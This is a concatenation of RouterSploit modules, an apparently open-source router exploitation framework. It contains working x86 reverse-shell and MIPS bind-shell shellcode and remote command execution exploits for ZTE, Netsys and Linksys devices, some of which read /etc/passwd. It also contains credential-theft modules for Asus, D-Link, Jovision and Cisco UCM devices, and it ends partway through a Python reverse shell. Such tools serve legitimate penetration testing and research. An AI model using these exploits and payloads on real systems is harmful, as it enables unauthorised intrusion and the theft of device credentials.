        b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
        b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
        b"\x00\x80\x00\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
        b"\x00\x10\x00\x00"
    ),
    Architectures.MIPSBE: (
        b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00\x00\x34"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00"
        b"\x00\x40\x00\x00\xde\xad\xbe\xef\xde\xad\xbe\xef\x00\x00\x00\x07"
        b"\x00\x00\x10\x00"
    ),
    Architectures.MIPSLE: (
        b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
        b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00"
        b"\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
        b"\x00\x10\x00\x00"
    ),
    Architectures.X86: (
        b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
        b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
        b"\x00\x80\x04\x08\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
        b"\x00\x10\x00\x00"
    ),
    Architectures.X64: (
        b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00\x00\x00"
        b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00\x00\x00\x00\x00"
        b"\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00"
        b"\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42"
        b"\x00\x10\x00\x00\x00\x00\x00\x00"
    )
}


class ReverseTCPPayloadMixin(metaclass=ExploitOptionsAggregator):
    handler = PayloadHandlers.REVERSE_TCP
    lhost = OptIP('', 'Connect-back IP address')
    lport = OptPort(5555, 'Connect-back TCP Port')


class BindTCPPayloadMixin(metaclass=ExploitOptionsAggregator):
    handler = PayloadHandlers.BIND_TCP
    rport = OptPort(5555, 'Bind Port')


class BasePayload(BaseExploit):
    architecture = None
    handler = None
    encoder = OptString("", "Encoder")
    fmt = None

    def __init__(self):
        if self.handler not in PayloadHandlers:
            raise OptionValidationError(
                "Please use one of valid payload handlers: {}".format(
                    PayloadHandlers._fields
                )
            )

    def generate(self):
        raise NotImplementedError("Please implement 'generate()' method")

    def run(self):
        raise NotImplementedError()

    def get_encoders(self):
        encoders = []

        # get all encoders for given architecture
        all_encoders = [e for e in index_modules() if "encoders.{}".format(self.architecture) in e]

        for e in all_encoders:
            encoder = e.replace("encoders.{}.".format(self.architecture), "").replace(".", "/")
            module = getattr(importlib.import_module('routersploit.modules.' + e), "Encoder")
            encoders.append((
                "{}/{}".format(self.architecture, encoder),
                module._Encoder__info__["name"],
                module._Encoder__info__["description"],
            ))

        return encoders

    def get_encoder(self, encoder):
        module_path = "routersploit/modules/encoders/{}".format(encoder).replace("/", ".")

        try:
            module = getattr(importlib.import_module(module_path), "Encoder")
        except ImportError:
            return None

        return module()


class ArchitectureSpecificPayload(BasePayload):
    output = OptString("python", "Output type: elf/c/python")
    filepath = OptString("/tmp/{}".format(random_text(8)), "Output file to write")

    def __init__(self):
        super(ArchitectureSpecificPayload, self).__init__()
        if self.architecture not in Architectures:
            raise OptionValidationError(
                "Please use one of valid payload architectures: {}".format(
                    Architectures._fields
                )
            )

        self.header = ARCH_ELF_HEADERS[self.architecture]
        self.bigendian = True if self.architecture.endswith("be") else False

    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, "wb+") as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError(
                "No such option as {}".format(self.output)
            )

        return content

    def generate_elf(self, data):
        elf = self.header + data

        if elf[4] == 1:  # ELFCLASS32 - 32 bit
            if self.bigendian:
                p_filesz = pack(">L", len(elf))
                p_memsz = pack(">L", len(elf) + len(data))
            else:
                p_filesz = pack("<L", len(elf))
                p_memsz = pack("<L", len(elf) + len(data))

            content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
        elif elf[4] == 2:  # ELFCLASS64 - 64 bit
            if self.bigendian:
                p_filesz = pack(">Q", len(elf))
                p_memsz = pack(">Q", len(elf) + len(data))
            else:
                p_filesz = pack("<Q", len(elf))
                p_memsz = pack("<Q", len(elf) + len(data))

            content = elf[:0x60] + p_filesz + p_memsz + elf[0x70:]

        return content

    @staticmethod
    def generate_c(data):
        res = "unsigned char sh[] = {\n    \""
        for idx, x in enumerate(data):
            if idx % 15 == 0 and idx != 0:
                res += "\"\n    \""
            res += "\\x%02x" % x
        res += "\"\n};"
        return res

    @staticmethod
    def generate_python(data):
        res = "payload = (\n    \""
        for idx, x in enumerate(data):
            if idx % 15 == 0 and idx != 0:
                res += "\"\n    \""
            res += "\\x%02x" % x
        res += "\"\n)"
        return res


class GenericPayload(BasePayload):
    def run(self):
        print_status("Generating payload")

        payload = self.generate()
        if self.encoder:
            payload = self.encoder.encode(payload)

        if self.fmt:
            payload = self.fmt.format(payload)

        print_info(payload)
        return payload



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    BindTCPPayloadMixin,
)


class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "MIPSLE Bind TCP",
        "description": "Creates interactive tcp bind shell for MIPSLE architecture.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.MIPSLE

    def generate(self):
        bind_port = utils.convert_port(self.rport)

        return (
            b"\xe0\xff\xbd\x27" +  # addiu   sp,sp,-32
            b"\xfd\xff\x0e\x24" +  # li      t6,-3
            b"\x27\x20\xc0\x01" +  # nor     a0,t6,zero
            b"\x27\x28\xc0\x01" +  # nor     a1,t6,zero
            b"\xff\xff\x06\x28" +  # slti    a2,zero,-1
            b"\x57\x10\x02\x24" +  # li      v0,4183 ( __NR_socket )
            b"\x0c\x01\x01\x01" +  # syscall

            b"\xff\xff\x50\x30" +  # andi    s0,v0,0xffff
            b"\xef\xff\x0e\x24" +  # li      t6,-17                        ; t6: 0xffffffef
            b"\x27\x70\xc0\x01" +  # nor     t6,t6,zero                    ; t6: 0x10 (16)
            bind_port + b"\x0d\x24" +  # li      t5,0xFFFF (port)   ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
            b"\x04\x68\xcd\x01" +  # sllv    t5,t5,t6                      ; t5: 0x5c110000
            b"\xfd\xff\x0e\x24" +  # li      t6,-3                         ; t6: -3
            b"\x27\x70\xc0\x01" +  # nor     t6,t6,zero                    ; t6: 0x2
            b"\x25\x68\xae\x01" +  # or      t5,t5,t6                      ; t5: 0x5c110002
            b"\xe0\xff\xad\xaf" +  # sw      t5,-32(sp)
            b"\xe4\xff\xa0\xaf" +  # sw      zero,-28(sp)
            b"\xe8\xff\xa0\xaf" +  # sw      zero,-24(sp)
            b"\xec\xff\xa0\xaf" +  # sw      zero,-20(sp)
            b"\x25\x20\x10\x02" +  # or      a0,s0,s0
            b"\xef\xff\x0e\x24" +  # li      t6,-17
            b"\x27\x30\xc0\x01" +  # nor     a2,t6,zero
            b"\xe0\xff\xa5\x23" +  # addi    a1,sp,-32
            b"\x49\x10\x02\x24" +  # li      v0,4169 ( __NR_bind )A
            b"\x0c\x01\x01\x01" +  # syscall

            b"\x25\x20\x10\x02" +  # or      a0,s0,s0
            b"\x01\x01\x05\x24" +  # li      a1,257
            b"\x4e\x10\x02\x24" +  # li      v0,4174 ( __NR_listen )
            b"\x0c\x01\x01\x01" +  # syscall

            b"\x25\x20\x10\x02" +  # or      a0,s0,s0
            b"\xff\xff\x05\x28" +  # slti    a1,zero,-1
            b"\xff\xff\x06\x28" +  # slti    a2,zero,-1
            b"\x48\x10\x02\x24" +  # li      v0,4168 ( __NR_accept )
            b"\x0c\x01\x01\x01" +  # syscall

            b"\xff\xff\xa2\xaf" +  # sw v0,-1(sp) # socket
            b"\xfd\xff\x11\x24" +  # li s1,-3
            b"\x27\x88\x20\x02" +  # nor s1,s1,zero
            b"\xff\xff\xa4\x8f" +  # lw a0,-1(sp)
            b"\x21\x28\x20\x02" +  # move a1,s1 # dup2_loop
            b"\xdf\x0f\x02\x24" +  # li v0,4063 ( __NR_dup2 )
            b"\x0c\x01\x01\x01" +  # syscall 0x40404
            b"\xff\xff\x10\x24" +  # li s0,-1
            b"\xff\xff\x31\x22" +  # addi s1,s1,-1
            b"\xfa\xff\x30\x16" +  # bne s1,s0 <dup2_loop>

            b"\xff\xff\x06\x28" +  # slti a2,zero,-1
            b"\x62\x69\x0f\x3c" +  # lui t7,0x2f2f "bi"
            b"\x2f\x2f\xef\x35" +  # ori t7,t7,0x6269 "//"
            b"\xec\xff\xaf\xaf" +  # sw t7,-20(sp)
            b"\x73\x68\x0e\x3c" +  # lui t6,0x6e2f "sh"
            b"\x6e\x2f\xce\x35" +  # ori t6,t6,0x7368 "n/"
            b"\xf0\xff\xae\xaf" +  # sw t6,-16(sp)
            b"\xf4\xff\xa0\xaf" +  # sw zero,-12(sp)
            b"\xec\xff\xa4\x27" +  # addiu a0,sp,-20
            b"\xf8\xff\xa4\xaf" +  # sw a0,-8(sp)
            b"\xfc\xff\xa0\xaf" +  # sw zero,-4(sp)
            b"\xf8\xff\xa5\x27" +  # addiu a1,sp,-8
            b"\xab\x0f\x02\x24" +  # li v0,4011 ( __NR_execve )
            b"\x0c\x01\x01\x01"  # syscall 0x40404
        )



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "ZTE F460 & F660 Backdoor RCE",
        "description": "Exploits ZTE F460 and F660 backdoor vulnerability that allows "
                       "executing commands on operating system level.",
        "authors": (
            "Rapid7",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://community.rapid7.com/community/infosec/blog/2014/03/04/disclosure-r7-2013-18-zte-f460-and-zte-f660-webshellcmdgch-backdoor",
        ),
        "devices": (
            "ZTE F460",
            "ZTE F660",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop")
            shell(self)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        data = {
            "IF_ACTION": "apply",
            "IF_ERRORSTR": "SUCC",
            "IF_ERRORPARAM": "SUCC",
            "IF_ERRORTYPE": "-1",
            "Cmd": cmd,
            "CmdAck": ""
        }

        response = self.http_request(
            method="POST",
            path="/web_shell_cmd.gch",
            data=data
        )
        if response is None:
            return ""

        if response.status_code == 200:
            regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
            res = re.findall(regexp, response.text, re.DOTALL)

            if len(res):
                return res[0]

        return ""

    @mute
    def check(self):
        marker = utils.random_text(32)
        cmd = "echo {}".format(marker)

        response = self.execute(cmd)
        if marker in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import socket

from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_error
from routersploit.core.exploit.utils import is_ipv4
from routersploit.core.exploit.utils import is_ipv6


UDP_SOCKET_TIMEOUT = 8.0


class UDPCli:
    """ UDP Client provides methods to handle communication with UDP server """

    def __init__(self, udp_target: str, udp_port: int, verbosity: bool = False) -> None:
        """ UDP client constructor

        :param str udp_target: target UDP server ip address
        :param int udp_port: target UDP server port
        :param bool verbosity: display verbose output
        :return None:
        """

        self.udp_target = udp_target
        self.udp_port = udp_port
        self.verbosity = verbosity

        self.peer = "{}:{}".format(self.udp_target, self.udp_port)

        if is_ipv4(self.udp_target):
            self.udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        elif is_ipv6(self.udp_target):
            self.udp_client = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
        else:
            print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity)
            return None

        self.udp_client.settimeout(UDP_SOCKET_TIMEOUT)

    def send(self, data: bytes) -> bool:
        """ Send UDP data

        :param bytes data: data that should be sent to the server
        :return bool: True if data was sent, False otherwise
        """

        try:
            self.udp_client.sendto(data, (self.udp_target, self.udp_port))
            return True
        except Exception as err:
            print_error(self.peer, "Error while sending data", err, verbose=self.verbosity)

        return False

    def recv(self, num: int) -> bytes:
        """ Receive UDP data

        :param int num: number of bytes that should received from the server
        :return bytes: bytes received from the server
        """

        try:
            response = self.udp_client.recv(num)
            return response
        except Exception as err:
            print_error(self.peer, "Error while receiving data", err, verbose=self.verbosity)

        return None

    def close(self) -> bool:
        """ Close UDP connection

        :return bool: True if connection was closed successful, False otherwise
        """

        try:
            self.udp_client.close()
            return True
        except Exception as err:
            print_error(self.peer, "Error while closing udp socket", err, verbose=self.verbosity)

        return False


# pylint: disable=no-member
class UDPClient(Exploit):
    """ UDP Client exploit """

    target_protocol = Protocol.UDP

    verbosity = OptBool(True, "Enable verbose output: true/false")

    def udp_create(self, target: str = None, port: int = None) -> UDPCli:
        """ Create UDP client

        :param str target: target UDP server ip address
        :param int port: target UDP server port
        :return UDPCli: UDP client object
        """

        udp_target = target if target else self.target
        udp_port = port if port else self.port

        udp_client = UDPCli(udp_target, udp_port, verbosity=self.verbosity)
        return udp_client



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netsys Multi RCE",
        "description": "Exploits Netsys multiple remote command execution vulnerabilities that allows "
                       "executing commands on operating system level.",
        "authors": (
            "admin <admin[at]bbs.00wz.top>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://bbs.00wz.top/forum.php?mod=viewthread&tid=12630",
        ),
        "devices": (
            "Multiple Netsys",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(9090, "Target HTTP port")

    def __init__(self):
        self.injections = [
            "/view/IPV6/ipv6networktool/traceroute/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
            "/view/systemConfig/systemTool/ping/ping.php?text_target=127.0.0.1&text_pingcount=1&text_packetsize=40|{}",
            "/view/systemConfig/systemTool/traceRoute/traceroute.php?text_target=127.0.0.1&text_ageout=2&text_minttl=1&text_maxttl=1|{}"
        ]

        self.valid = None

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            print_status("Invoking command loop...")
            shell(self, architecture="mipsle")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        marker = utils.random_text(16)
        cmd = cmd.replace(" ", "+")
        payload = "echo+{};{};echo+{};".format(marker, cmd, marker)

        path = self.valid.format(payload)
        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return ""

        regexp = "{}(.+?){}".format(marker, marker)
        res = re.findall(regexp, response.text, re.DOTALL)

        if len(res):
            return res[0]

        return ""

    @mute
    def check(self):
        cmd = "cat+/etc/passwd;"

        for injection in self.injections:
            path = injection.format(cmd)

            response = self.http_request(
                method="GET",
                path=path
            )
            if response is None:
                continue

            if utils.detect_file_content(response.text, "/etc/passwd"):
                self.valid = injection
                return True  # target is vulnerable

        return False  # target not vulnerable



from routersploit.core.exploit import *
from routersploit.core.bluetooth.btle_client import BTLEClient


class Exploit(BTLEClient):
    __info__ = {
        "name": "Bluetooth LE Enumerate",
        "description": "Enumerating services and characteristics of a given "
                       "Bluetooth Low Energy devices.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/",
        ),
    }

    target = OptMAC("", "Target MAC address")

    def run(self):
        res = self.btle_scan(self.target)
        if res:
            device = res[0]

            device.print_info()
            device.print_services()



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Asus RT-N16 Password Disclosure",
        "description": "Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.",
        "authors": (
            "Harry Sintonen",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://sintonen.fi/advisories/asus-router-auth-bypass.txt",
        ),
        "devices": (
            "ASUS RT-N10U, firmware 3.0.0.4.374_168",
            "ASUS RT-N56U, firmware 3.0.0.4.374_979",
            "ASUS DSL-N55U, firmware 3.0.0.4.374_1397",
            "ASUS RT-AC66U, firmware 3.0.0.4.374_2050",
            "ASUS RT-N15U, firmware 3.0.0.4.374_16",
            "ASUS RT-N53, firmware 3.0.0.4.374_311",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/error_page.htm",
        )
        if response is None:
            return

        creds = re.findall(r"if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)

        if len(creds):
            c = [("admin", creds[0])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *c)
        else:
            print_error("Credentials could not be found")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/error_page.htm",
        )
        if response is None:
            return False  # target is not vulnerable

        creds = re.findall(r"if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)

        if len(creds):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-8XX Password Disclosure",
        "description": "Module exploits D-Link DIR-8XX password disclosure vulnerability, "
                       "which allows retrieving administrative credentials.",
        "authors": (
            "Hack2Win",  # vulnerability discovery
            "Peter Geissler",  # vulnerablity discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://blogs.securiteam.com/index.php/archives/3310",
            "https://blogs.securiteam.com/index.php/archives/3364",
            "https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin",
        ),
        "devices": (
            "D-Link DIR-8XX",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        self.credentials = []

        if self.check():
            print_success("Target seems to be vulnerable")
            print_table(("User ID", "Username", "Password"), *self.credentials)
        else:
            print_error("Exploit Failed - Target does not seem to be vulnerable")

    @mute
    def check(self):
        headers = {
            "Content-Type": "text/plain;charset=UTF-8",
            "Content-Length": "0"
        }

        response = self.http_request(
            method="POST",
            path="/getcfg.php?A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1",
            headers=headers
        )

        if response is None:
            return False

        usrids = re.findall("<usrid>(.*?)</usrid>", response.text)
        usernames = re.findall("<name>(.*?)</name>", response.text)
        passwords = re.findall("<password>(.*?)</password>", response.text)

        if usrids or usernames or passwords:
            self.credentials = [creds for creds in zip(usrids, usernames, passwords)]
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Linksys E-Series TheMoon RCE",
        "description": "Module exploits remote code execution vulnerability in multiple Linksys E-Series "
                       "devices. Vulnerability was actively used by TheMoon Worm.",
        "authors": (
            "Johannes Ullrich",  # worm discovery
            "Rew",  # original exploit
            "infodox",  # another exploit
            "Michael Messner <devnull[at]s3cur1ty.de>",  # metasploit module
            "juan vazquez",  # minor help with msf module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/31683/",
            "https://www.securityfocus.com/bid/65585",
            "https://packetstormsecurity.com/files/125253",
            "https://packetstormsecurity.com/files/125252",
            "https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633",
            "https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630",
        ),
        "devices": (
            "Linksys E900",
            "Linksys E1000",
            "Linksys E1200",
            "Linksys E1500",
            "Linksys E1550",
            "Linksys E2000",
            "Linksys E2100L",
            "Linksys E2500",
            "Linksys E3000",
            "Linksys E3200",
            "Linksys E4200",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    arch = OptString("mipsle", "Target architecture: mipsbe, mipsle")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available")
            if self.arch == "mipsbe":
                shell(self, architecture="mipsbe", method="wget", location="/tmp")
            elif self.arch == "mipsle":
                shell(self, architecture="mipsle", method="wget", location="/tmp")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        cmd = "-h `{}`".format(cmd)
        data = {
            "submit_button": "",
            "change_action": "",
            "action": "",
            "commit": "0",
            "ttcp_num": "2",
            "ttcp_size": "2",
            "ttcp_ip": cmd,
            "StartEPI": "1",
        }

        self.http_request(
            method="POST",
            path="/tmUnblock.cgi",
            data=data,
        )

        return ""

    @mute
    def check(self):
        # See https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
        response = self.http_request(
            method="GET",
            path="/HNAP1/",
            headers={'Host': 'test'}
        )

        if not (response):
            return False  # target is not vulnerable

        content = response.content
        if content and content.find(b'ModelName') == -1:
            return False  # target is not vulnerable

        # target may be vulnerable

        response = self.http_request(
            method="GET",
            path="/tmUnblock.cgi",
        )

        if response and response.status_code in [200, 301, 302] and not any(i in response.text.lower() for i in ["page not found", "error", "404", "not found"]):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
import json


class Exploit(HTTPClient):
    __info__ = {
        "name": "Jovision camera credential disclosure",
        "description": "Exploit implementation for jovision IP camera Credential Disclosure vulnerability. "
                       "If target is vulnerable details of user accounts on the device including usernames and passwords are returned.",
        "authors": (
            "aborche",  # vulnerability discovery
            "casept",  # routersploit module
        ),
        "references": (
            "https://habr.com/ru/post/318572/",  # Original post in Russian
            "https://weekly-geekly.github.io/articles/318572/index.html"  # English translation
        ),
        "devices": (
            "JVS-N63-DY"
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            response = self.http_request(
                method="GET",
                path="/cgi-bin/jvsweb.cgi?cmd=account&action=list"
            )
            if response is None:
                print_error("Exploit failed - connection error")
                return

            # The camera returns a JSON document with accounts, parse it
            j_resp = json.loads(response.text)

            # Some cameras have multiple accounts configured, list all of them
            accounts = list()
            for acc in j_resp:
                account = list()
                account.append(acc.get("acDescript"))  # Account description
                account.append(acc.get("acID"))  # Account username
                account.append(acc.get("acPW"))  # Acccount password
                # There seems to be some kind of permission level system for users
                # 20 seems to always be admin, normal users have <20
                if acc.get("nPower") >= 20:
                    account.append("Yes")
                else:
                    account.append("No")
                accounts.append(account)

            print_success("Accounts found:")
            print_table(("Description", "Username", "Password",
                         "Administrator"), *accounts)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/cgi-bin/jvsweb.cgi?cmd=account&action=list"
        )

        if response is not None and response.status_code == 200:
            res = re.findall(".*acID.*", response.text)
            if len(res) > 0:
                return True

        return False



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)


class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "X86 Reverse TCP",
        "description": "Creates interactive tcp reverse shell for X86 architecture.",
        "authors": (
            "Ramon de C Valle",  # metasploit module
            "joev",  # metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        )
    }

    architecture = Architectures.X86

    def generate(self):
        reverse_ip = utils.convert_ip(self.lhost)
        reverse_port = utils.convert_port(self.lport)

        return (
            b"\x31\xdb" +                     # xor ebx,ebx
            b"\xf7\xe3" +                     # mul ebx
            b"\x53" +                         # push ebx
            b"\x43" +                         # inc ebx
            b"\x53" +                         # push ebx
            b"\x6a\x02" +                     # push byte +0x2
            b"\x89\xe1" +                     # mov ecx,esp
            b"\xb0\x66" +                     # mov al,0x66 (sys_socketcall)
            b"\xcd\x80" +                     # int 0x80
            b"\x93" +                         # xchg eax,ebx
            b"\x59" +                         # pop ecx
            b"\xb0\x3f" +                     # mov al,0x3f (sys_dup2)
            b"\xcd\x80" +                     # int 0x80
            b"\x49" +                         # dec ecx
            b"\x79\xf9" +                     # jns 0x11
            b"\x68" + reverse_ip +            # push ip addr
            b"\x68\x02\x00" + reverse_port +  # push port
            b"\x89\xe1" +                     # mov ecx,esp
            b"\xb0\x66" +                     # mov al,0x66 (sys_socketcall)
            b"\x50" +                         # push eax
            b"\x51" +                         # push ecx
            b"\x53" +                         # push ebx
            b"\xb3\x03" +                     # mov bl,0x3
            b"\x89\xe1" +                     # mov ecx,esp
            b"\xcd\x80" +                     # int 0x80
            b"\x52" +                         # push edx
            b"\x68\x6e\x2f\x73\x68" +         # push n/sh
            b"\x68\x2f\x2f\x62\x69" +         # push //bi
            b"\x89\xe3" +                     # mov ebx,esp
            b"\x52" +                         # push edx
            b"\x53" +                         # push ebx
            b"\x89\xe1" +                     # mov ecx,esp
            b"\xb0\x0b" +                     # mov al,0xb (execve)
            b"\xcd\x80"                       # int 0x80
        )



from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient


class Exploit(UDPClient):
    __info__ = {
        "name": "Cisco UCM Info Disclosure",
        "description": "Module exploits information disclosure vulnerability in Cisco UCM devices. "
                       "If the target is vulnerable it is possible to read sensitive information through TFTP service.",
        "authors": (
            "Daniel Svartman <danielsvartman[at]gmail.com",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/30237/",
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7030",
        ),
        "devices": (
            "Cisco UCM",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(69, "Target port")

    def __init__(self):
        self.payload = b'\x00\x01' + b'SPDefault.cnf.xml' + b'\x00' + b'netascii' + b'\x00'

    def run(self):
        print_status("Sending payload")
        udp_client = self.udp_create()
        udp_client.send(self.payload)

        response = udp_client.recv(2048)

        if response and len(response):
            if b"UseUserCredential" in response:
                print_success("Exploit success - file {}".format("SPDefault.cnf.xml"))
                print_info(response)
            else:
                print_error("Exploit failed - credentials not found in response")
        else:
            print_error("Exploit failed - empty response")

    @mute
    def check(self):
        udp_client = self.udp_create()
        udp_client.send(self.payload)

        response = udp_client.recv(2048)

        if response and len(response) and b"UseUserCredential" in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit.option import OptEncoder
from routersploit.core.exploit.payloads import (
    GenericPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder


class Payload(ReverseTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Python Reverse UDP",
        "description": "Creates interactive udp reverse shell by using python.",
        "authors": (
            "Andre Marques (zc00l)",  # shellpop
            "Marcin Bury <marcin[at]threat9.com>"  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    encoder = OptEncoder(Encoder(), "Encoder")

    def generate(self):
        return (
            "import os\n" +
            "import pty\n" +
            "import socket\n" +
            "s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n" +
            "s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
